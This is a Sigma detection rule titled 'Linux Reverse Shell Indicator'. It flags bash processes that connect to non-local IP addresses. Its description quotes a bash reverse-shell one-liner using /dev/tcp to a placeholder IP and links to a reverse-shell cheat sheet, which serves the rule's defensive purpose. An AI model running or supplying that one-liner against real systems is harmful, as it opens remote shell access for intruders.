Linux Reverse Shell Indicator

 Original Source: [Sigma source]
Title: Linux Reverse Shell Indicator
Status: test
Description:Detects a bash contecting to a remote IP address (often found when actors do something like 'bash -i >& /dev/tcp/10.0.0.1/4242 0>&1')
References:
  -https://github.com/swisskyrepo/PayloadsAllTheThings/blob/d9921e370b7c668ee8cc42d09b1932c1b98fa9dc/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md
Author: Florian Roth (Nextron Systems)
Date: 2021-10-16
modified:2022-12-25
Tags:
  • -'attack.execution'
  • -'attack.t1059.004'
Logsource:
  • product: linux
  • category: network_connection
Detection:
  selection:
    Image|endswith: '/bin/bash'
  filter:
    DestinationIp:
      -'127.0.0.1'
      -'0.0.0.0'

  condition:selection and not filter
Falsepositives:
  -Unknown
Level: critical